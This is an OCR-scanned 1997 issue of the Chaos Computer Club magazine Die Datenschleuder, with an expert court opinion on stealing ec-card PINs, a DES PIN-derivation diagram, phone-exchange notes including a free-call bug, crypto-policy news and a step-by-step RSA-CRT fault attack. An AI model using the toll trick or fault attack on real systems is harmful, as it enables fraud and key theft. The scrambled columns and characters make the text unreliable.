wenn die ãGentleman-TŠterÒ auf das Niveau Mšglichkeiten aufgezeigt, wie unberechtigte
TŠter in kŸrzester Zeit Kenntnis einer PIN
herkšmmlicher Geldschrankknacker des Ede- erlangen kšnnen. Das Gericht mšge
Typs reduziert werden. bewerten, ob eine der vorgestellten Methoden
... in diesem Rechtsstreit mit Ÿberzeugender
Es lŠ§t sich auch beim automatisierten Wahrscheinlichkeit angewandt worden sein
Zahlungssystem, wie bei jedem anderen tech- kann. Wegen der Unmšglichkeit einer
forensischen Untersuchung der Magnetkarte
nischen System, nicht leugnen, da§ es kšnnen durch den SachverstŠndigen nur die
risikobehaftet ist. Die Frage ist nur, ob es sich unter den gesicherten UmstŠnden technisch
um das unvermeidbare ãRestrisikoÒ handlet,

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
unmšglichen Methoden ausgesondert TatumstŠnde von allen bekannten Varianten
werden. Bei den Ÿbriggebliebenen kann der die hšchste Wahrscheinlichkeit zu
SachverstŠndige weder eine Mšglichkeit unterstellen.
ausschlie§en noch beweisen.
zu 2:
Frage:
Die Magnetkarte der KlŠgers kann auch mit
a) Unter welchen Vorraussetzungen und mit Produktionsfehlern behaftet gewesen sein,
welchem zeitlichen Aufwand lŠ§t sich die die die Eingabe einer beliebigen PIN
PIN einer gestohlenen ec-Karte von einem erlauben. Ein solches Verhalten ist in
TŠter ermitteln? mehreren aufgetretenen FŠllen dokumentiert,
Antwort: so da§ es auch in diesem Fall nicht
ausgeschlossen werden kann. Es ist fŸr die
Da der KlŠger angibt, seinen PIN-Brief sofort Beurteilung von hypothetischem Wert, ob das
nach Empfang vernichtet zu haben und auch Verhalten als Karten- oder Programmfehler
die PIN inzwischen vergessen und niemals angesehen wird. DarŸber hinaus kšnnen die
einen Geldausgabeautomaten benutzt zu entwendete ec-Karte des KlŠgers auch von
haben, scheiden alle Mšglichkeiten einer dem TŠter mit diesem Ziel verŠndert worden
AusspŠhung aus. sein. Da die Karte aber nicht forensisch unter-
Denkbar bleiben somit die Mšglichkeiten sucht werden kann, bleiben alle Aussagen
einer Ermittlung der PIN (1), einer Vermutungen.
Manipulation der Magnetkarte (2) oder eines Weil aber auch keine Transaktionsprotokolle
Systemfehlers (3) in Form eines und Protokollstreifen der GAA / POS
Programmfehlers (ãBetriebssystemÒ) bzw. vorgelegt wurden, lŠ§t sich nicht feststellen,
aufgrund der ãBetriebsartÒ (online/ofßine). ob die PIN Ÿberhaupt im Rahmen der
zu 1: unberechtigten Abhebungen geprŸft worden
ist.
Wegen der langen Zeit seit Versendung des
PIN-Briefes an den KlŠger ist Mšglichkeit des Wegen der derzeit nicht mšglichen
Abfangens dieses Briefes auf dem Postweg Auswertung der entwendeten ec-Karte des
nahezu ausschlie§en. KlŠgers kann auch nicht Ÿber die Historie der
Verwendung dieser Karte festgestellt werden.
Bei der empirischen Ermittlung der PIN
durch Ausprobieren ist die hšchste zu 3:
Erfolgswahrscheinlichkeit mit 1:150 anzuneh- Selbst wenn zur Tatzeit ein Programmfehler
men. in der Systemsoftware der Beklagten nicht
Wie im Rahmen der Risikoanalyse dargelegt, vorhanden war, lŠ§t sich dieser heute nicht
ist die Wahrscheinlichkeit einer rechnerischen mehr feststellen, weil die Beklagte nach der
Ermittlung der PIN nach der Methode ãBrute Erfahrung des SachverstŠndigen auch
Force AttackÒ oder ãSmart AttackÒ geringer. gerichtsbeauftragten Externen kategorisch die
Es kann aber nicht mit letzter Sicherheit Information hierŸber verweigert.
ausgeschlossen werden, da§ es noch andere,
effektivere rechnerischer Methoden zur Die Frage nach der Betriebsart des
Ermittlung der PIN gibt, von denen der Zahlungssystems der Beklagten zum
SachverstŠndige zur Zeit noch keine Kentnis Tatzeitpunkt kann der SachverstŠndige
hat. derzeit nicht beantworten, weil die
vorgelegten KontoauszŸge hierŸber nicht
Setzt man vorraus, da§ auch aussagen. Erst nach PrŸfung der relevanten
Systemkomponenten aus einem (geraubten) Transaktionsprotokolle und der
GAA verwendet worden sein kšnnten, so ist Kontrollstreifen der betroffenen GAA und
die schnelle und richtige Ermittlung der PIN POS kšnnen hierzu gutachterliche
zur Karte des KlŠgers nicht von der Hand zu Feststellungen getroffen werden.
weisen. Dieser Methode ist in Anbetracht der
Frage:

Die Datenschleuder
Nummer 59, Juni 1997
Gutachten 9422/03
b) Ist es dabei denkbar, da§ ein TŠter diese (25) Manfred Pausch: Gutachten fŸr AG Darmstadt 38
innerhalb von 30 Minuten herausÞndet, gege- C 4386/87, 10.07.1988
benenfalls mit Hilfe von Erkenntnissen aus (26) Ivar Kamsvag: Slik kan en minibank knekkes
einschlŠgigen Vortaten, um welche Computerworld Norge, 1/1993 S. 4-5, 15.01.1993
Vorkenntnisse m٤te es sich dabei handeln?
(27) NDR Ratgeber Technik: Archiv Ammann,
Antwort: Lehnhardt, Leptihn
Zum Zeitbedarf wurde bereits die Antwort (28) Westdeutsche Allgemeine Zeitung: Geldautomat
gegeben: Es ist denkbar, da§ ein TŠter die kopiert den Magnetstreifen, 12.01.1996
PIN einer gestohlenen ec-Karte innerhalb von
(29) Bundeskriminalamt, Kriminalistisches Institut,
30 Minuten herausÞndet.
Ref. Kl 12: ComputerkriminalitŠt 1995 in der
Wenn man Vorkenntnisse aus einschlŠgigen polizeilichen Kriminalstatistik (PKS):
Vortaten unterstellt, so m٤ten diese nach
Lage der TatumstŠnde mittels Gesamtdeutschland.
Systemkomponenten durchgefŸhrt worden Anmerkungen der Redaktion:
sein, wenn nicht ein dem SachverstŠndigen - Eingabe des PIN-Codes auf Touchscreen bei GAA:
derzeit unbekanntes Berechnungsverfahren z.B. Citibank (Quelle: Pausch bei Vortrag in Hamburg
zur PIN-Ermittlung eingesetzt worden ist. auf dem a«la Card-Forum)
Mit geringerer Wahrscheinlichkeit ist - Ofßine-Zeiten der GAA sind z.B. auch durch
anzunehmen, da§ der TŠter lediglich mit Umbuchung der technischen auf die juristischen
tieferem Wissen um die AblŠufe im
DatenbestŠnde bedingt, wie etwa bei der Deutschen
Zahlungsverkehr zum Erfolg gekommen ist.
Allerdings deutet der Umstand der dreisten Bank zwischen 22 und 7 Uhr (Batchbetrieb, auch kein
Barabhebungen auf fundiertes (Insider) Zugriff auf Kontostandsdrucker) (Quelle: Kunden-
Wissen im automatisierten Zahlungsverkehr Beobachtung ++)
hin. <...> - ãHardware-Sicherheits-ModulÒ : gemeint ist z.B. der
(1) Markus Kuhn: PIN auf EC-Karten knacken? / DALLAS DS5002FP, ein Hochsicherheits-
06.08.1996 <4pcnuq$4e9@cortex.dialin.rr-ze.uni- Microkontroller mit BUS-VerschlŸsselung, der von
erlangen.de>
(2) Ulf Moeller: Sicherheit von ec-Karten / 28.06.1996 Markus Kuhn vollstŠndig geknackt wurde. Befehlssatz
http://www.c2.net/~um/faq/pin.html ist 8031 kompatibel. (Quelle: Nachricht in de.org.ccc
(3) Die Datenschleuder - Das wissenschaftliche von Michael Holztl, kju@sauerland-online.de)
Fachblatt fŸr kreative Techniknutzung. Ein Organ des - die Hinweise auf auf die Entwendung eines solchen
Chaos Computer Club, Nr. 53 von Dezember 1995, Moduls und dem kriminellen Einsatz in der BRD
ISSN 0939-1045
(16) DIN/ISO 4909 und Regelwerk des Zentralen (Pausch in Hamburg: ãRegion BerlinÒ) entstammen
Kreditausschusses Christian Zimmermanns Buch ãDer HackerÒ, das
(19) AG Kšln 116 Js 599/89 bezŸglich seiner InformationsgŸte als oberߊchlich
(21) Zentraler Kreditausschu§: Anhang 3 zu den und undifferenziert und teilweise sachlich falsch zu
Richtlinien fŸr das deutsche ec-Geldautomatensystem bezeichnen ist. Der Autor Christian Zimmermann ist
i.d. F.v. 01.01.1995, S. 28
u.a. als einer der Drahtzieher der ãTelekom-AffŠreÒ um
(22) Siegfried Herda: Gutachten zur Sicherheit von ec- Ÿberhšhte Telefonrechnungen unschuldiger Kunden
Karten mit Magnetstreifen der Redaktion bekannt, verursacht durch
fŸr LG Kšln Az.: 1 1 S 338/92, Februar 1994 Manipulationen (Dialer etc.) an Telekomleitungen zum
(23) Michael J. Wiener: EfÞcient DES Key Search, Bell- Zwecke des Supporting von Auslands (ãSexÒ) und
Northern Research Ottawa 20. August 1993
(24) Balze, DifÞe, Rivest, Schneider, Shimomura, 0190-Nummern. Insofern sind seine Aussagen als
Thompson, Wiener: Minimal Key Lengths for ãHackerÒ unglaubwŸrdig, seine kriminellen
Symmetric Ciphers to provide Adequate Intentionen und Kontakte jedoch als glaubwŸrdig ein-
zustufen.

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit

Ermittlung der PIN

Bankleitzahl Konto-Nummer Kartenfolgenummer


12345678 1234567890 1

4567812345678901 zu verschlüsselnde Dezimalzahl

Wandlung in Binärzahl

DES 56 Bit geheimer Schlüssel

Ergebnis des DES-Verfahrens:


Vom Ergebnis werden 3.-6.
Inst.-Schl. 1D375AF548B34C48
Stelle fŸr PIN ausgewŠhlt.
Pool-Schl. 2FD5B2FF3A4827FF

ja nein
Instituts-
karte?

Ergebnis mit Ergebnis mit


375A Poolschlüssel D5B2
Institutsschlüssel

Offset wird bei


Poolschl. addiert 0248

Wandlung von Hex zu Dezimal nach Modulo 10

PIN 3750

Die Datenschleuder
Nummer 59, Juni 1997
OVst-Watch

Pannen bei Software-Updates Neue EWSD-Features


Bei der Einspielung der neuen Auch die Siemens-Vermittlungsstellen
Vermittlungsstellen-Software Anfang April (EWSD) erhielten kŸrzlich neue Software.
stŸrzten die SEL-Ortsvermittlungsstellen am Unter anderem wurde eine Art ãAnti-ScanÒ-
8.4.97 in NŸrnberg und MŸnchen erstmal Verhalten in Bezug auf */#/A/B/C/D-
ganz ab. In anderen Ortsnetzen wurden Kombinationen eingebaut. So reagiert die Vst
Netzansagen (z.B. ãKein Anschlu§ unter jetzt wesentlich toleranter auf ãversehentliche
dieser NummerÒ) nicht mehr korrekt wieder- FalscheingabenÒ bei Steuersequenzen (*xxx,
gegeben, Makeln funktionierte nicht mehr #xxx, *#xxx). Neu hinzugekommen
und einigen Teilnehmern wurde eine nicht gegenŸber dem vorigen Release sind *34#
abschaltbare Umleitung auf die T-Net-Box und *35# (bzw. #34#/*#34#/#35#/*#35#),
aktiviert. die wahrscheinlich eine Auswahl der Art der
Anrufsperre durch den Teilnehmer
ermšglichen sollen. Bisher konnte man mit
T-Net-Box *33# nur einen vorher festgelegten Typ (z.B.
Auslands- oder Vollsperre) aktivieren. Schon
seit der letzen Version gibt es *37# (RŸckruf
Die T-Net-Box ist der Anrufbeantworter im bei besetzt auch fŸr analoge AnschlŸsse) und
Netz der Telekom. Von den meisten *31# und *22# (Funktion unbekannt, wei§
AnschlŸssen an digitalen Vermittlungsstellen jemand genaueres?).
(S12/EWSD) kann dieser inzwischen Ÿber die
0130/144770 eingerichtet werden. Allerdings Ein eher nervendes Feature wurde mit
sollte man vorher sicherstellen, da§ man - im diesem Update der Anrufweiterleitung zuteil:
Falle eines ISDN-Anschlusses - Ÿber Der Anrufer hšrt, wenn er einen Anschlu§
Anrufweiterschaltung verfŸgt, bzw. bei nicht- anruft, der umgeleitet wird, die Ansage ãWir
ISDN die zugehšrigen Steuersequenzen verbinden weiterÒ. Somit entfŠllt die
freigeschaltet sind (*xxx#: Umleitung auf T- Mšglichkeit, Anrufe diskret umzuleiten.
Net-Box aktivieren, wobei fŸr xxx gilt: 000 -
alle Anrufe auf den Anrufbeantworter Bugs
umleiten, 555 - bei besetzt, 888 - nach 15
Sekunden klingeln. Mit #xxx# wird die jewei- Mit der neuen EWSD-Software verschwand
lige Umleitung deaktiviert). †brigens ist das auch ein sehr beliebter ISDN-Bug: FŸr alle
T-Net-Box-System noch mindestens bis zum AnschlŸsse an Siemens-Vsts gibt es eine
31.7. im Test-Betrieb. Dieser sollte zwar zum Nummer, mit der man begrenzt
1.6. beendet sein, mu§te jedoch wegen LeitungsqualitŠt und Funktion des
Software-Problemen verlŠngert werden. Anschlusses prŸfen kann (z.B. Berlin:
Bevor man diesen Netz-AB einem 01177555+<eigene Nummer>). Wenn man
herkšmmlichen vorzieht, sollte man jedoch jedoch 01177555+<eben nicht eigene, sondern
beachten, da§ die *T*** damit theoretisch eine andere Nr. in der selben Vst> wŠhlte,
Zugriff auf alle eingegangenen Nachrichten und zwar so, da§ ein Teil dieser Nummer in
hat. Blockwahl (mehrere Ziffern werden gleichzei-
Weitere Informationen zur T-Net-Box gibt es tig zur Vst geschickt, z.B. durch Wahl bevor
als Faxabruf-Dokument unter 0228/1819657 man den Hšrer abnimmt) und der andere Teil
oder bei den freundlichen Hotline einzeln Ÿbermittelt wurde, hatte man eine
Mitarbeitern unter 0130/141414. Verbindung zu diesem Anschlu§ -
gebŸhrenfrei (wie grundsŠtzlich alle
Verbindungen zu Nummern, die mit 0117
beginnen).
tobias@ccc.de

Die Datenschleuder
Nummer 59, Juni 1997
Krypto-News
mšglichst noch vor der Sommerpause eine
Direktive an die MitgliedslŠnder zur
EindŠmmung illegaler
EntschlŸsselungstechnik auszugeben.
DarŸber hinaus sollen sich auch
Privatpersonen strafbar machen, die illegale
EntschlŸsselungstechnik benutzen oder besit-
zen. Durch ein derartiges Gesetz entstŸnde
eine gefŠhrliche technische Grauzone in der
Strafbarkeit, weil damit letztlich alle
leistungsfŠhigen frei programmierbaren
Computer illegal werden.
Der Kosten/Nutzen-Aufwand zum Knacken
von Eurocrypt betraegt fŸr einen Geheim-
dienst mit Budget 300 Millionen US-Dollar ca.
zwšlf Sekunden, bei einem
Grossunternehmen mit 10 Mio$ Budget etwa
sechs Minuten (es heisst, der BND habe zwei
solcher Maschinen) und bei einer Investition
von nur 400 Dollar 38 Jahre.
<Zahlen schon nicht mehr aktuell, d. Setzer>
Wau Holland fuer eMailPress, die agentur gegen
den strich...emp@NADESHDA.gun.de
Deutscher Bundestag
Alte Welt bangt und zappelt Drucksache 13/7753
Gesetze gegen Codeknacker geplant 13. Wahlperiode 22.05.97
(emp) 06.06.97 - Eine europaweite Antwort der Bundesregierung auf die Kleine
Gesetzgebung gegen sogenannte Anfrage des Abgeordneten Dr. Manuel
ãFernsehpiraterieÒ rŸckt nŠher. Weil nicht Kiper und der Fraktion B†NDNIS 90/DIE
zuletzt durch den Einßuss der kryptofeind- GR†NEN - Drs. 13/ 7594
lichen Franzosen bei der Eurocrypt-Norm ein
ãschwachesÒ VerschlŸsselungsverfahren (DES Lage der IT-Sicherheit in Deutschland
mit nur 56 Bit) gewŠhlt wurde, sind 47.Welcher Aufwand ist nach Kenntnis der
Codeknacker bei der EntschlŸsselung von Bundesregierung nštig, um mit asymmetrischen
Pay-TV-Fernsehprogrammen oft erfolgreich. Verfahren verschlŸsselte Daten mit
Statt starke VerschlŸsselungsverfahren SchlŸssellŠngen von 40, 56 und 128 Bit zu
zuzulassen, soll jetzt sogar der Besitz von entschlŸsseln und wie gross ist nach
Computern kriminalisiert werden, wenn sie Auffassung der Bundesregierung die fŸr eine
geeignet zum Codeknacken sind. Der Bericht VerschlŸsselung sensitiver Daten hinreichende
fordert Strafgesetze gegen Personen und SchlŸssellŠnge fŸr eine - auch Ÿber die nŠchsten
Unternehmen, die ohne Autorisierung GerŠte fŸnf Jahre - sichere †bermittlung?
und EntschlŸsselungssoftware herstellen, ver- Unter der Voraussetzung, dass fŸr ein
breiten oder verkaufen. 422 Abgeordnete des symmetrisches Verfahren keine andere
Europaparlamentes stimmten am 13. Mai Analysemethode bekannt ist als die
1997 in Strassburg dem ãAnastassopoulos- vollstŠndige Absuche des SchlŸsselraumes,
BerichtÒ zu, bei sechs Gegenstimmen und lassen sich die nachstehenden Aussagen
sechs Enthaltungen. Das Parlament treffen:
beauftragte die EuropŠische Kommission,

Die Datenschleuder
Nummer 59, Juni 1997
* 40-Bit-Verfahren kšnnen - allerdings mit
hohem zeitlichen und apparativen Aufwand USA-Regulierungen
mittels Hochleistungsrechnern oder auf dem Kontrolleinschränkungssimulation
Wege des ãverteilten RechnensÒ entziffert
werden. Die genaue Hšhe des Aufwandes ist
verfahrensabhŠngig. The US government will announce later
today that will soon lift controls on
* 56-Bit-Verfahren erfordern zu ihrer technology crucial to doing business over the
Entzifferung den Einsatz vonSpezialrechnern, Internet, White House advisor Ira Magaziner
die eigens zu diesem Zweck konstruiert said yesterday evening.
werden mŸssen. Bei deren entsprechender
Dimensionierung lŠsst sich der zeitliche Under plans expected to be outlined at a
Aufwand auf die Groessenordnung von noontime press brieÞng today, the federal
Stunden begrenzen. government will require that producers of
specialized, narrowly focused data
* Die vollstŠndige Absuche eines 128-Bit- scrambling products submit only to one-time
SchlŸsselraums entzieht sich jeder heute und government approval before they sell
in absehbarer Zeit verfŸgbaren powerful encryption products abroad.
Rechentechnik. Current policy requires case-by-case approval
Ab einer SchlŸssellŠnge von etwa 80 Bit kann in most instances.
- bei ansonsten entzifferungsresistentem ãBasically it will say that for basic Þnancial
Design - die Mšglichkeit einer Analyse and electronic applications there will be no
durch Absuche des SchlŸsselraums fŸr export restrictions and no requirement for
die Ÿberschaubare Zukunft, insbesondere der key recovery,Ò Magaziner said.
nŠchsten fŸnf Jahre, ausgeschlossen werden.
US Undersecretary of Commerce William
Reinsch is expected to give details of the plan.
Verteilte brute force attacke auf DES Reinsch could not be reached for comment.
Computer industry executives and public
DES noch nicht tot, stinkt aber schon interest groups said the new arrangement,
though far short of deregulating all
Am 19. 6.1997 war es soweit: erstmals in der encryption, was a step in the right direction.
Geschichte hat eine nicht-geheime ãThis is evidence that the administration ack-
Organisation einen DES-SchlŸssel durch nowledges that manufacturers of foreign
brute force geknackt. Von der Firma RSA
wurden $10.000 Preisgeld und ein
Plaintext/Ciphertext-Paar bereitgestellt,
insgesamt wurden von mehreren tausend
Teilnehmern in zwei ueber das Internet
koordinierten Gruppen (eine fuer die USA,
eine fuer den Rest) ungefaehr 50% des
Schluesselraums durchsucht, und es wurden
nach vorsichtigen Schaetzungen 447.000
MIPS-Jahre verbraten. Damit geht dieser
Hack als groesste verteile Berechung in die
Geschichte ein.
andreas@ccc.de

Die Datenschleuder
Nummer 59, Juni 1997
Krypto-News
render it all but useless for general use. Visa,
MasterCard and American Express developed
the standard. ãI«d expect programs written
the SET to get very rapid approval - within
weeks,Ò Daguio said.
In addition, US companies will have leeway
to export any kind of encryption to any bank
as long as that encryption is used only for
legitimate, internal bank functions. Products
designed for merchant-to-merchant
transactions without a bank in between
would still be subject to stricter controls,
including use of weak software routines that
make decoding by law enforcement easy, or
deposit of decoding keys with law
enforcement bodies prior to export.
Commerce Department regulations will spell
out details this month or next, Daguio said.
encryption products do exist,Ò said Peter Though more sweeping in nature than past
Harter, public policy counsel at Netscape government regulations, the US banking
Communications Corp. ãTheir policy has put industry has long enjoyed more freedom to
American industry in the back seat and now use powerful encryption technologies abroad
were trying to catch up.Ò David Banisar, than other industries. Successive
policy analyst at the Washington-based administrations have granted banks that
Electronic Privacy Information Center, called leeway since by deÞnition they must have
the move a ãsmall step forward.Ò greater safeguards over employee behavior
Nonetheless, ãit still doesn’t reach the needs than all but a handful of industries. In additi-
for secure e-mail or other purposes,Ò he said. on, Þnancial applications have long been
Computer software and hardware eligible for easier to design for export since they typically
decontrol under the proposed regulations require encryption of only a few standard
must Þt several criteria, said Kawika Daguio, data Þelds. If sufÞciently limited in design,
a public affairs specialist with the American the reasoning goes, they pose no threat to law
Bankers Association who helped hammer out enforcement concerned about smugglers or
an agreement for the new regulations. terrorists who may want to evade detection
.Though products designed for use by the by law enforcement. The government and the
general public may be unlimited in the computer industry have for years been locked
strength of the encryption techniques they in disputes over the relative importance of
employ, they must also be strictly limited in encryption technologies and their potential
use, he said. Software written for home for misuse. [...]
banking, for instance, must be usable only for Absent US encryption exports, they claim,
bank transactions and not easily modiÞed for American companies will soon lose their
general use. Most programs handed out by leadership role in a technology crucial to the
banks for PC banking at home Þt that criteria, country’s competitiveness.
he said. Federal ofÞcials, on the other hand, have said
Programs that use the industry SET standard export of the technology threatens global
for credit card purchases over the Internet security, since terrorists and criminals in
should easily meet Commerce Department outlaw states like Libya and North Korea
criteria, too, since the SET standard encrypts could easily use the technology to defeat
only those data essential to making online wiretaps and data searches increasingly
purchases; the limited uses of the standard prized by law enforcement and national secu-

Die Datenschleuder
Nummer 59, Juni 1997
rity agencies. In response, they demand that In letzter Minute: Amis drehen doch noch durch
exports of powerful encryption include so- ALERT: Senate to vote on mandatory
called key recovery - a method by which law
enforcement can gain access to the encryption key escrow as early as Thu June 19!
keys used to encode messages. Many public
interest groups have condemned the plans, On Tuesday June 17, Senators John McCain (R-AZ) and
however, saying such a transfer of power to Bob Kerrey (D-NE) introduced legislation which would
law enforcement threatens to usher in an era all but mandate that Americans provide guaranteed
of ubiquitous and illegal eavesdropping. government access to their private online
Several bills pending in Congress would do communications and stored Þles. The bill, known as
away with nearly all controls. Reinsch was ãThe Secure Public Networks Act of 1997Ò (S.909)
expected to testify at congressional hearings represents a full scale assault on your right to protect
on one of the bills this morning. the privacy and conÞdentiality of your online commu-
By Will Rodger /Washington Bureau Cheif nications. Though offered on Capitol Hill as a compro-
Inter@ctive Week mise, the McCain-Kerrey bill is virtually identical to
draft legislation proposed earlier this year by the
These ãnewÒ regulations ãto be issuedÒ are Clinton Administration while doing nothing to protect
scrambling to catch up with previous and the privacy and security of Internet users. The bill
current practices... closely mirrors draft legislation proposed by the
Clinton Administration earlier this Spring. SpeciÞcally,
the bill would:
It doesn’t change things at all. * Compel Americans to Use Government-Approved
When they issued the new export regulations Key Recovery Systems * Make Key Recovery a
in January, the glaring hole was the absence Condition Of Participation in E-Commerce * Allow
of an explicit exception for the Þnancial indu- Government Carte Blanche Access to Sensitive
stry. Under the customs that evolved around Encryption Keys Without a Court Order * Create New
ITAR, you could get an export license for Opportunities for Cybercrimes * Codify a low 56-bit
strong crypto as long as the overseas Key Length Limit on Encryption Exports * Create
customer was a Þnancial institution. This Broad New Criminal Penalties for the Use of
announcement is simply a public Encryption. The full text of the bill, along with a detai-
acknowledgment that the BXA will look led analysis, is available online at
favorably on export requests to banks and http://www.cdt.org/crypto/
that someday theyÕll try to draft speciÞc regu-
lations on the subject. Meanwhile you do it
by grinding through the bureacracy. Export
permission for strong crypto that only
encrypts Þnancial data is clearly a variant of
this tradition. They already granted export
permission for one vendor of such a system,
so IÕm not surprised theyÕre planning to make
up a regulation to cover it.
Rick. smith@securecomputing.com

PGP darf exportiert werden


Pretty Good Privacy, hat vom US-Handels-
ministerium die Erlaubnis bekommen, da§
das Produkt nun auch mit der 128-Bit-
Verschluesselungstechnologie ofÞziell
exportiert werden darf.
30.05.97 Horizont Newsline

Die Datenschleuder
Nummer 59, Juni 1997
Abt. wundersame Dinge
Fehler & Folgen Nach dem Chinesischen-Restsatz (Chinese
RSA(CRT): One strike and you’re out! Remainder Theorem) existieren nŠmlich zwei
einfach und nur einmal im voraus
bestimmbare Werte a und b mit
Manchmal sind es die berŸhmten
Randbemerkungen, die kryptographische a = 1 MOD p, a = 0 MOD q bzw b = 0 MOD
Erdbeben auslšsen sollten. Speziell wenn die- p, b= 1 MOD q.
se Randbemerkung zwei Tage nach einer Mit diesen beiden Zahlen gilt
wichtigen Veršffentlichung von Arjen Lenstra E=aE[p]+bE[q] MOD N.
kommt. Lenstra ist nicht nur einer der
HackervŠter von digicrime, sondern auch Diese ist offensichtlich deutlich efÞzienter als-
promovierter Mathematiker und einer der die direkte Potenzierung modulo N, da die
fŸhrenden Faktorisierungsforscher. Wenn die Operationen mit deutlich kŸrzeren Zahlen
Wissenschaftler von Bellcore in ihrem durchgefŸhrt werden kšnnen. Bruce Schneier
berŸhmten Artikel ãOn the Importance of empÞehlt in seinem Standardwerk
Checking Cryptographic Protocols on FaultsÒ ãAngewandte KryptographieÒ (1996) dieses
also eine Mail von Lenstra zitieren, ist Vorgehen und auch die RSAREF-Referenzim-
sicherlich Aufmerksamkeit angesagt. plementierung von RSASDI und PGP
verwenden das CRT. Sind p und q ungefŠhr
Aber irgendwie scheint es mal wieder gleich gro§, halbiert sich ungefŠhr die LŠnge
niemanden zu interessieren, was sich der Zwischenergebnisse. Dies ist natŸrlich
Hacker/Mathematiker da Ÿberlegt haben. fŸr Chipkarten mit beschrŠnktem
Dabei ist die Sache hšchst brisant: EINE Speicherplatz von ganz besonderem Vorteil.
durch Hardwarefehler unkorrekte RSA- Die Signaturzeit wird nach Angaben der
Unterschrift fŸhrt mit fast 100%-iger Chipkartenhersteller mindestens halbiert.
Sicherheit zur Aufdeckung des geheimen
RSA-SchlŸssels. Der ãAngreiferÒ bekommt FAMEX -Zahlen aus einem Philipsprospekt
die Mšglichkeit direkt angezeigt, und die (Mai 1997)
Berechnung ist trivial. SchlŸssel-Bits, 512, 768, 1024, 2048
Um es wissenschaftlich exakt zu formulieren: Straightforward (ms), 140, 410, 805, 18200
Entsteht ein Fehler wŠhrend des Signierens, Chinese Remainder (ms), 56, 164, 322, 2156
tritt er mit hoher Wahrscheinlichkeit zum im Gehen wir nun davon aus, da§ entweder bei
Fehlermodell angenommenen Zeitpunkt auf. der Berechnung von E[p] oder von E[q] ein
Er kann als beliebiger Bitfehler angenommen Fehler auftritt. Diese Annahme ist, da diese
und mit sehr hoher Wahrscheinlichkeit kann Berechnungen die zeitlich aufwendigsten
das RSA-Modul N mit einem Aufwand von Abschnitte des Algorithmus sind, sehr
einer Potenzierung mit dem šffentlichen realistisch. Nun ist mit hoher
Exponenten, einer Addition und einer GGT- Wahrscheinlichkeit N kein Teiler von (M-
Blidung faktorisiert werden. F^e), wobei e der zur VeriÞkation der
Aber der Reihe nach: Signatur benštigte šffentliche Exponent ist.
Dann gilt aber
Durch einen altbekannten mathematischen
Trick kann man die fŸr das RSA-Verfahren GGT(M-F^e,N)=q.
notwendige, aufwendige Potenzierung stark Somit kann man den RSA-Modul N(=pq) fak-
beschleunigen. Statt die RSA-Signatur torisieren und so einfach den geheimen
E=m^d MOD N SchlŸssel d berechnen. Kurz gesagt ist das
der kryptographische Super-GAU.
direkt modulo N zu berechnen, rechnet man
die beiden Werte Witzig dabei ist, da§ der einfache Anwender,
der zur Kontrolle der Signatur M=E^e
E[p] =m^d MOD p und E[q]=m^d MOD q, ausrechnen mu§, direkt auf den Fehler hinge-
wobei p und q die beiden Primfaktoren von wiesen wird.
N sind.

Die Datenschleuder
Nummer 59, Juni 1997
ROTFLBTCDICAJTTWADBSIHPWTRHITSBKABAYB
„Rolling On The Floor Loughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost
Dieing By Smashing Into HP Who’s Then Running Horrified Into The Street Being Killed Accidentally By A Yellow
Bulldowzer“
(de.org.ccc/10.06.1997/kraxel@felix.intern)
In der Orginalarbeit von Dan Boneh, Richard SET auch durch
DeMillo und Lipton vom 26. September 1995 The security protocol for safeguarding credit-
gingen die Autoren noch davon aus, da§ fŸr card transactions on the Internet may have to
ihren Angriff eine korrekte UND eine fehler- be changed because the underlying
hafte RSA-Signatur der selben Nachricht M cryptography is too easy to decode and too
von Nšten sind. Hier traten dann die profes- difÞcult to upgrade. Steve Mott, senior vice
sionellen Abwiegler auf den Plan. Durch president of electronic commerce and new
ErgŠnzung der Nachricht (beispielsweise mit ventures for MasterCard International, said it
Zeitstempeln) wŸrde schon seit lŠngerem could take hackers as little as a year to break
erreicht, da§ niemals die gleiche Nachricht the industryÕs standard encryption code,
zweimal unterzeichnet wird. Wenn nur eine which is supposed to render credit-card num-
fehlerhafte Unterschrift benštigt wird, hilft bers unreadable to outsiders on the Internet.
dies zunŠchst nichts. Allenfalls durch das
HinzufŸgen von Zufallszeichen (random For that reason, the consortium of technology
padding) aus einem kryptographisch starken companies and creditors that has spent two
Zufallsgenerator, kann, da dann die eigentlich years years developing the Secure Electronic
unterschriebene Nachricht MÕ nicht bekannt Transaction (SET) protocol may switch to a
ist, der Lenstra-Angriff verhindert werden. faster encryption system called Elliptic Curve,
Dies bedarf aber mšglicherweise einer which is produced by <Certicom Corp>.
Protokollanpassung und weiterer Forschung. The Þrst complete version of SET, known as
Bis dahin mu§ das nochmalige VeriÞzieren SET 1.0, will be available to software makers
der Signatur vor der Ausgabe dringend emp- June 1 with core cryptography provided by
fohlen werden. Bei der gro§en Chipkarten- RSA Data Security, a unit of Security
konferenz ãTechnologie Ô97Ò Mitte Juni Dynamics Technologies Inc <SDTI.O>. ãRSA
interessierte sich leider so gut wie keiner der is a very good starting point. But we suspect
Experten fŸr diese SicherheitslŸcke. that in a year or two, the Kevin Mitnicks of
Um es nochmals festzuhalten: the world will start to Þgure out ways to hack
it,Ò Mott said, referring to Mitnick, a
Entsteht zufŠllig, durch von Hackerhand hin- notorious computer hacker. ãThe only way
zugefŸgten physikalischen Stre§ oder einen you scale an RSA is to add a lot more bits.
INDEL-Prozessor, eine fehlerhafte RSA You add a lot more bits and it becomes more
Ausgabe, kann mit einem 8080 und ein paar complex software in terms of the interaction
Millisekunden der geheime RSA-SchlŸssel of the transaction messages. ThatÕs part of
bestimmt werden. whatÕs taken SET so long to start with,Ò he
Also fŸr alle noch mal die Hackanleitung: said. Mott told that the Elliptic Curve system
Wenn einem eine fehlerhafte RSA-Unterschrift would make a better encryption core. In fact,
F prŠsentiert wird, einfach mal GGT(M-F^e, he said it would have been chosen in the Þrst
N) ausrechnen. Fast sicher hat man dann place if developers had been known about it.
einen Faktor des RSA-Moduls gefunden. ãIt will Þt on a chip card. I think its 160 bits
Wenn man dann noch einen kurzen Blick in equals security to 1,024 bits of RSA,Ò the
ein beliebiges Kryptographiebuch zur Bestim- credit industry executive said. ãWe anticipate
mung des geheimen SchlŸssels d aus p und q putting it intosome SET 1.0 pilots in the very
wirft, dŸrfte man einen Hauptgewinn near future this year in the U.S.Ò Far from
gemacht haben. being disturbed by the possibility of hackers
